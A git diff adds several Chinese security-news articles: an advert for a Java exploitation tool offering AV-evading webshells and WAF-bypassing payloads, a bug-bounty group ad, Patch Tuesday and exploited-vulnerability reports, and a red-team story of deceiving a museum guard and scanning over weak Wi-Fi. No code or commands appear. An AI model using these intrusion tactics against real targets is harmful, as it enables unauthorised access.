+![](https://mmbiz.qpic.cn/sz_mmbiz_png/icZ1W9s2Jp2Xvvlzc5lra8XdgLYGCfX5ooaMiaUJy4vKvStTngQp4122jauXltltcCuYib5WBBdaXu5dh91dGvibyQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +**01** + +**工具介绍** + +一款java漏洞集合工具, +包含Struts2、Fastjson、Weblogic(xml)、Shiro、Log4j、Jboss、SpringCloud、等漏洞检测利用模块,及免杀webshell生成模块 Bypass、以及一些小工具模块,由于图形化比较简明易懂,所以也不需要使用说明吧 。 + + +本项目的部分payload进行了一些混淆,具备一定过waf能力,有空会更新所有的payload。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/icZ1W9s2Jp2XRr1WGB0jCkb7yoWJg7YRduYcPfnYCUibDdmkyMg3dou0VdZ5PrSwY5eJXp0MKT1ebawcmagF3ySg/640?wx_fmt=png "") + + +**02** + +**工具下载** + +**点击关注下方名片****进入公众号** + +**回复关键字【241116****】获取** +**下载链接** + + +**03** + +**往期精彩** + +[ 一款集成高危漏洞exp的实用性工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492694&idx=1&sn=593e032dc17a72a4ca4250d4a3f210f1&chksm=c36ba0aef41c29b832e8f14aafe90179de166338058ad1d6096d5b9f956e771a308d9824db65&scene=21#wechat_redirect) + + + + +[ 飞企互联平台一键漏洞探测工具,支持单 url 以及批量探测 ](http://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492693&idx=1&sn=8851d74c488cd340383f0ee3e81e6b10&chksm=c36ba0adf41c29bbc7c735e4e1d186c6f0803f60c81337816df768810e0f3ac9251155ff9ab5&scene=21#wechat_redirect) + + + + +[ 一款常规的渗透攻防武器库! ](http://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492676&idx=1&sn=aa23e6c95b94fd25c4421d89147eb170&chksm=c36ba0bcf41c29aa7a9e655bc743e19d0c2397e61779c49bf10a40c73cfc4bfc2c0b9c6767ef&scene=21#wechat_redirect) + + + +![](https://mmbiz.qpic.cn/mmbiz_png/OAmMqjhMehrtxRQaYnbrvafmXHe0AwWLr2mdZxcg9wia7gVTfBbpfT6kR2xkjzsZ6bTTu5YCbytuoshPcddfsNg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&random=0.8399406679299557 "") + diff --git a/doc/建了个SRC专项漏洞知识库.md b/doc/建了个SRC专项漏洞知识库.md new file mode 100644 index 00000000..10c5f41d --- /dev/null +++ b/doc/建了个SRC专项漏洞知识库.md @@ -0,0 +1,50 @@ +# 建了个SRC专项漏洞知识库 + Z2O安全攻防 2024-11-16 12:30 + +建立了一个 +src专项圈子,内容包含**src漏洞知识库**、**src挖掘技巧**、**src视频教程**等,一起学习赚赏金技巧,以及专属微信群一起挖洞 + +圈子专注于更新src相关: + +``` +1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例 +2、分享src优质视频课程 +3、分享src挖掘技巧tips +4、小群一起挖洞 +``` + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOABrvjQvw6cnCXlwS05xyzHjx9JgU7j83aReoqqUbdpiaMX2HeudxqYg/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOXg868PqXyjsACp9LhuEeyfB2kTZVOt5Pz48txg7ueRUvDdeefTNKdg/640?wx_fmt=png&from=appmsg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuYgNUapJqQxicbYTJoohoBK32iat5p76xlsgd6bdhZsdAgtNzPEv9CEOh96qgHK3ibHHBa4kRibjQeuibw/640?wx_fmt=jpeg "") + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6aUeMdaWrKXgYYia2On8nMA7bqWDySa8odAq1a0kkp3WFgf0Zp0Eut0A/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuZDDDv3NsbJDuSicLzBbwVDCPFgbmiaJ4ibf4LRgafQDdYodOgakdpbU1H6XfFQCL81VTudGBv2WniaDA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "null") + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIx3z6YtXqmOkmp18nLD3bpyy8w4daHlAWQn4HiauibfBAk0mrh2qNlY8A/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugI5tZcaxhZn1icWvbgupXzkwybR5pCzxge4SKxSM5z4s9kwOmvuI3cIkQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +图片 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOHgjJxnq1ibibJgVUx3LwCjZj62vygx8w6rxia1icmIWiax2YlP6S6LmlmlQ/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOApVm8H605qOibxia5DqPHfbWD6lmcweDjGv4DLl45waD068ugw2Iv2vg/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOwldaSATYOh1WQpk1qz15rLxehOAn4aK7tdbSyNEuHDZpIISCtl6Q8w/640?wx_fmt=png&from=appmsg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIstia27YLJFBtC5icJO6gHLLgzRDqib6upI3BsVFfLL02w6Q8jIRRp0NJA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6JWUFIwPbP7Au1PYLXTplb3bbFZFlaYDtXXTqPdzOO6iaFz8F7r8WUPw/640?wx_fmt=png&from=appmsg "") + diff --git a/doc/微软2024年11月份于周二补丁日针对90漏洞发布安全补丁.md b/doc/微软2024年11月份于周二补丁日针对90漏洞发布安全补丁.md new file mode 100644 index 00000000..08e9a83f --- /dev/null +++ b/doc/微软2024年11月份于周二补丁日针对90漏洞发布安全补丁.md @@ -0,0 +1,212 @@ +# 微软2024年11月份于周二补丁日针对90漏洞发布安全补丁 +何威风 河南等级保护测评 2024-11-15 16:00 + +微软周二透露,影响 Windows NT LAN 管理器 (  +NTLM + ) 和任务计划程序的两个安全漏洞已被广泛利用。 +- **52 个远程代码执行 (RCE) 漏洞** +:这些漏洞允许攻击者在易受攻击的系统上远程执行任意代码。 + +- **26 特权提升 (EoP) 漏洞** +:这些漏洞使攻击者能够获得比授权更高级别的访问权限。 + +- **4 拒绝服务 (DoS) 漏洞** +:这些漏洞可以通过使系统超载来破坏服务。 + +- **3 欺骗漏洞** + +- **2 个安全功能绕过 (SFB) 漏洞** + +- **1 信息泄露漏洞** +。 + +这些安全漏洞是这家科技巨头在 2024 年 11 月补丁星期二更新中解决的 +90 个安全漏洞 +之一。在这 90 个漏洞中,有 4 个被评为“严重”,85 个被评为“重要”,1 个被评为“中等”。修补的漏洞中有 52 个是远程代码执行漏洞。 + +这些修复是微软自 2024 年 10 月补丁星期二更新发布以来在其基于 Chromium 的 Edge 浏览器中解决的 +31 个漏洞 +的补充。以下是被列为积极利用的两个漏洞 - +- CVE-2024-43451 +(CVSS 评分:6.5)- Windows NTLM 哈希泄露欺骗漏洞 + +- CVE-2024-49039 +(CVSS 评分:8.8)- Windows 任务计划程序特权提升漏洞 + +微软在 CVE-2024-43451 的公告中表示:“此漏洞会将用户的 NTLMv2 哈希泄露给攻击者,攻击者可利用此哈希进行用户身份验证”,并感谢 ClearSky 研究员 Israel Yeshurun 发现并报告了此漏洞。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/rTibWNx9ARWlr2gsy0GXlIR3oaTAYLNlTyOw66kxwlVX5k7h17WI5mmgR2IDYPaVXyOlGfSexAgTC4MAoIGzCYA/640?wx_fmt=png&from=appmsg "") + +值得注意的是,CVE-2024-43451 是继 +CVE-2024-21410 +(2 月修补)和 +CVE-2024-38021 +(7 月修补)之后的第三个漏洞,可用于泄露用户的 NTLMv2 哈希,并且仅在今年就被广泛利用。 + +Tenable 高级研究工程师 Satnam Narang 在一份声明中表示:“攻击者继续坚持发现和利用可以泄露 NTLMv2 哈希的零日漏洞,因为它们可用于对系统进行身份验证,并可能在网络内横向移动以访问其他系统。” + +另一方面,CVE-2024-49039 可能允许攻击者执行原本仅限于特权帐户的 RPC 功能。但是,微软指出,成功利用该漏洞需要经过身份验证的攻击者在目标系统上运行特制应用程序,以首先将其权限提升到中等完整性级别。 + +谷歌威胁分析小组 (TAG) 的 Vlad Stolyarov 和 Bahare Sabouri 以及一位匿名研究人员因报告该漏洞而受到认可。这提出了一种可能性,即零日漏洞利用与某些与民族国家结盟的团体或高级持续威胁 (APT) 行为者有关。 + +目前尚不清楚这些缺陷是如何在野外被利用的,也不清楚这些攻击有多广泛,但这一发展促使美国网络安全和基础设施安全局 (CISA) 将它们 +添加 +到已知被利用漏洞 (  +KEV + ) 目录中。 + +其中一个公开披露但尚未被利用的零日漏洞是 +CVE-2024-49019 +(CVSS 评分:7.8),这是 Active Directory 证书服务中的一个权限提升漏洞,可利用该漏洞获取域管理员权限。该漏洞被称为 EKUwu, +上个月由 TrustedSec +记录了其详细信息。 + +另一个值得注意的漏洞是 +CVE-2024-43498 +(CVSS 评分:9.8),这是 .NET 和 Visual Studio 中的一个严重远程代码执行错误,远程未经身份验证的攻击者可以通过向易受攻击的 .NET Web 应用程序发送特制的请求或通过将特制的文件加载到易受攻击的桌面应用程序中来利用该错误。 + +此更新还修复了影响 Windows Kerberos 的严重加密协议缺陷( +CVE-2024-43639 +,CVSS 评分:9.8),该缺陷可能被未经身份验证的攻击者滥用来执行远程代码。 + +本月发布中评分最高的漏洞是 Azure CycleCloud 中的远程代码执行缺陷( +CVE-2024-43602 +,CVSS 评分:9.9),该缺陷允许具有基本用户权限的攻击者获得 root 级特权。 + +Narang 表示:“利用该漏洞非常简单,只需向易受攻击的 AzureCloud CycleCloud 集群发送请求即可修改其配置。随着组织继续转向利用云资源,攻击面也随之扩大。” + +最后,雷德蒙德解决的一个非微软发布的 CVE 是 OpenSSL 中的远程代码执行漏洞( +CVE-2024-5535 +,CVSS 评分:9.1)。它 +最初 +由 OpenSSL 维护人员于 2024 年 6 月修补。 + +微软表示:“利用此漏洞需要攻击者通过电子邮件向受害者发送恶意链接,或者说服用户点击该链接,通常是通过电子邮件或即时通讯消息进行诱惑。” + +“在最糟糕的电子邮件攻击情况下,攻击者可以向用户发送特制的电子邮件,而无需受害者打开、阅读或点击链接。这可能导致攻击者在受害者的机器上执行远程代码。” + +与 11 月的安全更新同时,微软还宣布采用通用安全公告框架 (CSAF),这是一种以机器可读形式披露漏洞的 OASIS 标准,用于所有 CVE,以加快响应和补救工作。 + +该公司表示 +:“CSAF 文件更多是供计算机使用,而不是供人类使用,因此我们将 CSAF 文件添加到我们现有的 CVE 数据渠道中,而不是替代 +。这是继续提高我们供应链透明度的开始,我们将继续提高整个供应链中漏洞的透明度,包括我们产品中嵌入的开源软件。” +## 2024 年 11 月修复的其他漏洞 +- Citrix 修补 +虚拟应用程序和桌面 RCE 漏洞 + +- SAP 安全更新 +:高危漏洞补丁 + +- 爱普生设备漏洞 +可让攻击者创建恶意管理员账户 + +- Palo Alto Networks 警告 +PAN-OS 存在严重远程代码执行漏洞 + +- 思科工业无线 +软件漏洞使攻击者能够以 root 用户身份运行命令 + +- HPE Aruba 接入点中的 +多个漏洞 +使攻击者能够执行远程代码 + +- Azure  +API 管理漏洞 +使攻击者可以完全控制 APIM 服务 + +- Chrome 安全更新 +:修复多个高严重性漏洞 + +- Rockwell ThinManager 漏洞 +使系统面临 DoS 攻击 + +- Android 零日 +漏洞遭攻击利用,立即修补! + +- QuRouter 中的关键 +QNAP 零日 +漏洞已修补,立即更新! + +- PfSense 存储型 XSS 漏洞 +可导致 RCE 攻击,PoC 已发布 + +- Okta Verify Agent + Windows 漏洞使攻击者能够窃取用户密码 + +- Opera 浏览器零日 +漏洞可导致恶意扩展程序接管浏览器 + +- 严重的 +qBittorrent RCE 漏洞 +使攻击者能够注入恶意脚本 + +- 海康威视网络摄像机 +漏洞使攻击者能够拦截动态 DNS 凭证 + +**微软补丁日系列回顾** + +[微软2024年10月份于周二补丁日针对118个漏洞发布安全补丁,两个被广泛利用](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652111569&idx=2&sn=86988cdfb7ee76b055ac801063254b9a&chksm=8bbb28e8bccca1fe8c5da4a00077c0f0231f013412d294a74b6eff9f893ff19c9b70b526b0f3&scene=21#wechat_redirect) +**** + +[微软2024年9月份于周二补丁日针对79个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652110380&idx=1&sn=49ef976b3590b37b5503277d0b199439&chksm=8bbcd415bccb5d03daeff63e8c42230bddac315195226141d0980c9bcba0e5bf90c5b3f5c30e&scene=21#wechat_redirect) + + +[微软2024年8月份于周二补丁日针对90个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652109338&idx=1&sn=52b533c2ef821e718bf342edf1bfb4fe&chksm=8bbcd023bccb59358aa99905ac73070be24edc627199c264223f2f53acaac6bf912cc5185d44&scene=21#wechat_redirect) + + +[微软2024年7月份于周二补丁日针对143个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652108626&idx=1&sn=3dff254352fdd8f31b082b3d4bd9078e&chksm=8bbcdd6bbccb547d2889e83cd7aec66a8050b6ac8a92c68156207cb31fd2378dfd234968d7f1&scene=21#wechat_redirect) +**** + +[微软2024年6月份于周二补丁日针对51个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652107585&idx=2&sn=d699cb1b939a877d8d758e997a710bb0&chksm=8bbcd978bccb506e6c5ad3b12157a949dc7f484173096e0833c14505df9e8d5fd94ce8ba415b&scene=21#wechat_redirect) +**** + +微软2024年5月份于周二补丁日针对61个漏洞发布安全补丁**** + +[微软2024年4月份于周二补丁日针对149个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652106650&idx=1&sn=f4d9fb98776cb0c3ac1a3b74621434d2&chksm=8bbcc5a3bccb4cb5fee54a39582c2911786c2cd04c3cb83b29796c2169ba80dc616684c3e987&scene=21#wechat_redirect) + + +[微软2024年3月份于周二补丁日针对61个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105630&idx=3&sn=564d21f3b78f3a83ecb663a47d21e6df&chksm=8bbcc1a7bccb48b14bd0705ce92b9b76b2cac214890316c15ef7d96421f51442b3c58f0f4785&scene=21#wechat_redirect) +**** + +[微软2024年2月份于周二补丁日针对73个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652105051&idx=2&sn=08d24a4e565cf1983a9a170ac32322f4&chksm=8bbcc362bccb4a7495f36fd05f0e3f3d259aa81ef7ef0938a84e1b1404098215c560adef4fcf&scene=21#wechat_redirect) + + +[微软2024年1月份于周二补丁日针对48个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652104077&idx=1&sn=00e775d8b18878c64a541a974f9f6900&chksm=8bbccfb4bccb46a228cb8c4b2a9b6293c1e931cc5d99962b5411431f59eb98b418d8427ba67e&scene=21#wechat_redirect) + + +[微软2023年1月份于周二补丁日针对98个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652097971&idx=1&sn=8d6aca53093c99fb7eecc5f6ec61fa32&chksm=8bbce78abccb6e9cf69522278424d43c4cbc3b67e27d70c7612bbd456a92368f829493a70b5e&scene=21#wechat_redirect) + + +[微软2023年2月份于周二补丁日针对75个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652098496&idx=2&sn=f5d0880366dcb15ad2142bbd5f7caacb&chksm=8bbce5f9bccb6cefc1d69cc3327f45c25b1cc9a508be2595dda94f34730a1ea7285cca5dc50b&scene=21#wechat_redirect) + + +[微软2023年3月份于周二补丁日针对80个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652098832&idx=3&sn=ed178ef0b84ef588fe19a1b4994f0de8&chksm=8bbcfb29bccb723f105e1b714af495ad31dcc62d972b68cd9b76b3109392825708dfc6e5c928&scene=21#wechat_redirect) + + +[微软2023年4月份于周二补丁日针对97个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652099128&idx=1&sn=d16300692063a5dec9b42f7ad5bfc022&chksm=8bbcf801bccb7117fc6347c81930bc477b487ef12656a1c793d7ef999d4021c3e23713a94648&scene=21#wechat_redirect) + + +[微软2023年5月份于周二补丁日针对38个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652099961&idx=2&sn=bb8793c795c5fa0cf72d35d08afdb918&chksm=8bbcff40bccb76568d95daae1bdbfdc90a7efd40327d56691348132598bd33842356cd4d15e6&scene=21#wechat_redirect) + + +[微软2023年6月份于周二补丁日针对69个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652100192&idx=4&sn=a666f04b85155b3ec205561158c6d513&chksm=8bbcfc59bccb754fb6f9903a4fd7ff4d53561a13f0aa453701d10f1d4dd823a0a7e55c0d7741&scene=21#wechat_redirect) + + +[微软2023年7月份于周二补丁日针对132个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652100588&idx=1&sn=0eaf525c11c81aed0cc13f37b7cb4bb4&chksm=8bbcfdd5bccb74c34c4e523677f9bc40028c41c5ec8e9d0b210046917f9752f97755e0264be5&scene=21#wechat_redirect) + + +[微软2023年8月份于周二补丁日针对74个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652101058&idx=2&sn=b0b277ca5ccb12ce8b7674a7ea6d5e4e&chksm=8bbcf3fbbccb7aed14ee5eba02cf8d02a3d9bdc7f2aa1ae48f187874cc2b2399c1b691117177&scene=21#wechat_redirect) + + +[微软2023年9月份于周二补丁日针对59个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652101836&idx=3&sn=6abb19439dbcf1a6df86f4384f439bda&chksm=8bbcf6f5bccb7fe3c333fe22a18b8c23bc8774694261ecd2b02ea86d6ba211521b4af401cb09&scene=21#wechat_redirect) + + +[微软2023年10份于周二补丁日针对103个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652102158&idx=2&sn=8735223f48053ae4cfc90860b7acf092&chksm=8bbcf437bccb7d21a82d4126d25c12cd349bc03b05cbbaa5f06094863947b6be363d44bb9b20&scene=21#wechat_redirect) + + +[微软2023年11份于周二补丁日针对63个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652102933&idx=3&sn=7865e3470f1e380efd750e43600e8e5f&chksm=8bbccb2cbccb423ae5eb1be2ae4858c780df7d50f2173bf5dccdab296ddaef715e05cda7fb63&scene=21#wechat_redirect) + + +[微软2023年12份于周二补丁日针对33个漏洞发布安全补丁](http://mp.weixin.qq.com/s?__biz=MzA5MzU5MzQzMA==&mid=2652103585&idx=2&sn=8bab2889a8055a138993c4576ed6298f&chksm=8bbcc998bccb408e82abc8b36c6443c34f8ad7f85e88efef4490c82865f6791c3ec86b9dd876&scene=21#wechat_redirect) + + diff --git a/doc/打补丁要快!0Day漏洞正在被黑客广泛利用.md b/doc/打补丁要快!0Day漏洞正在被黑客广泛利用.md new file mode 100644 index 00000000..4c3ddefc --- /dev/null +++ b/doc/打补丁要快!0Day漏洞正在被黑客广泛利用.md @@ -0,0 +1,93 @@ +# 打补丁要快!0Day漏洞正在被黑客广泛利用 +老布 FreeBuf 2024-11-16 02:02 + +![](https://mmbiz.qpic.cn/mmbiz_gif/oQ6bDiaGhdyoFWEgZIHic7sqnootFEuOic7RlQNGhKY6d2ZESG3WpiaTMRlD0z4xO6mQrTZjkWHCkMpO2QtCfUJH6g/640?wx_fmt=gif&from=appmsg&wxfrom=5&wx_lazy=1&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn57I9BBPXUxN2OTqkz6aYOPu6aKlibzPGHqRejhibwypanMenmRkrlDyIw/640?wx_fmt=jpeg&from=appmsg "") + + +近日,美国、英国、加拿大、澳大利亚和新西兰(五眼联盟)网络安全机构联合发布了报告,公布了2023年最常被利用的漏洞清单。其中,零日漏洞已经成为黑客最常利用的漏洞类型。 + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5gBHud6gWfQnW07uXdl6PtawdDlU5rM1u60QU3yAG8vfnWT1EXsq8UQ/640?wx_fmt=jpeg&from=appmsg "") + + +该警告强调,攻击者们正越来越多地利用零日漏洞入侵企业,与2022年相比,零日漏洞利用的有所增长。 + + +与前几年旧的、未修补的漏洞占据列表的主导地位不同的是,在2023年漏洞利用趋势中,零日漏洞利用的激增,这反映出攻击者漏洞攻击策略的变化,即 +**在漏洞公布后的几天内快速利用。** +过去,安全漏洞被利用或许需要几个月时间,但现在,发现与利用之间的时间间隔已经减少到了几天甚至是几个小时。 + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR38kicxmSKeQw5hH5XX7P9Sn5tDbaKVQQIXcCFbQXT171c9g1aPzuU2xapM8YkPc6j7WMRg31OQBRNg/640?wx_fmt=jpeg&from=appmsg "") + + +报告另一个数据也指出,大量漏洞在披露后的两年内被积极利用,突显了及时补丁管理的必要性。 + + +在发布的2023年漏洞利用榜TOP15中,CVE-2023-3519漏洞位居榜首,该漏洞影响NetScaler ADC和NetScaler Gateway的多个版本,包括13.0、13.1、13.1-FIPS、12.1-FIPS和12.1-NDcPP等,在修补期间被广泛利用,导致了大量的设备被攻陷。 + + +CVE-2023-20198是另外一个排在前列的漏洞,影响Cisco IOS XE系统中的Web管理用户界面,允许黑客获得设备中最高等级的Level 15权限,从而可以完全控制相关设备,执行任意命令。此外Log4Shell漏洞(CVE-2021-44228),影响Apache的Log4j库,由于其广泛应用于各种软件应用中,即使在最初披露两年后仍然被利用。 + + +Tenable的高级研究员Satnam Narang表示,“入选2023年最常被利用漏洞榜的漏洞有一个共同点,即它们都暴露于互联网服务或系统中,包括从VPN解决方案到远程管理界面。这些面向互联网的系统中往往会使用包含已知漏洞的软件,从而导致被黑客成规模利用。 + + +另外,在漏洞利用榜中最古老的一个漏洞是七年前公布的(CVE-2017-6742),即便是到了2023年,仍然有很多的黑客在利用该漏洞对企业发起攻击。而根据一些情报信息,仍有大约24,000个Cisco IOS和IOS XE系统可能面临CVE-2023-20198漏洞的攻击。 + + +【 +FreeBuf粉丝交流群招新啦! + +在这里,拓宽网安边界 + +甲方安全建设干货; + +乙方最新技术理念; + +全球最新的网络安全资讯; + +群内不定期开启各种抽奖活动; + +FreeBuf盲盒、大象公仔...... + +扫码添加小蜜蜂微信回复「加群」,申请加入群聊 +】 + +![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "") +> https://www.bleepingcomputer.com/news/security/leaked-info-of-122-million-linked-to-b2b-data-aggregator-breach/ + +> +> +> +> +> +> +> +> +> +> +> +> +> +> + + +![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect) + +[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect) + +![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "") + diff --git a/doc/攻防演练 | 一次近源渗透.md b/doc/攻防演练 | 一次近源渗透.md new file mode 100644 index 00000000..197573a7 --- /dev/null +++ b/doc/攻防演练 | 一次近源渗透.md @@ -0,0 +1,60 @@ +# 攻防演练 | 一次近源渗透 +原创 zkaq -Alan 掌控安全EDU 2024-11-16 04:03 + +扫码领资料 + +获网安教程 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/BwqHlJ29vcrpvQG1VKMy1AQ1oVvUSeZYhLRYCeiaa3KSFkibg5xRjLlkwfIe7loMVfGuINInDQTVa4BibicW0iaTsKw/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +![](https://mmbiz.qpic.cn/mmbiz_png/b96CibCt70iaaJcib7FH02wTKvoHALAMw4fchVnBLMw4kTQ7B9oUy0RGfiacu34QEZgDpfia0sVmWrHcDZCV1Na5wDQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +# 本文由掌控安全学院 -   zkaq -Alan 投稿 + +**来****Track安全社区投稿~** + +**千元稿费!还有保底奖励~(https://bbs.zkaq.cn)** +## 1.XX博物馆 + +因为这次比赛有近源攻击,刚好资产上面有这个博物馆,因为信息太少没被打穿,就打车去近源攻击碰碰运气,第一天过去的时候刚好周末博物馆没开门,就管门卫说我们是游客能不能蹭个wifi,发个文件。门卫大叔还挺好,连上wifi后坐在他对面一通乱扫发现除了网关什么都没有,再抬头看门卫已经有点怀疑了,为了第二天开馆的时候能顺利过来,就说了声栓q就走了,第二天过来的时候,要过个安全检查,说不让带电脑进去,解释半天说过来工作的,抽时间出来玩待会还要工作,才让进去。进去之后惊喜来了,大堂wifi弱密码,连上之后看了一眼自动获取的ip排到了一百多我就知道有东西,然后就是把电脑放在一个角落 +让他慢慢扫,自己在那边闲逛,这家博物馆还挺不错,给兄弟们上图片。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/BwqHlJ29vcogThujOx2cAicLiahUClttzWqlZKrBVR2T5GFX2Eeqia7F5vQVCQOfibCX6xibOSt2I8X2cIsiawCibJrAA/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/BwqHlJ29vcogThujOx2cAicLiahUClttzWEpwHgBwLYf3vxgSS9dDLVpjKicUibog9TjYiaJYnzBQ7CQqCOuJJUoibjg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/BwqHlJ29vcogThujOx2cAicLiahUClttzWmIc2uUicUH389o3Izv9payqSicjCub8SpZfE6Ia8IMlf23vBCWTOH2ZQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + 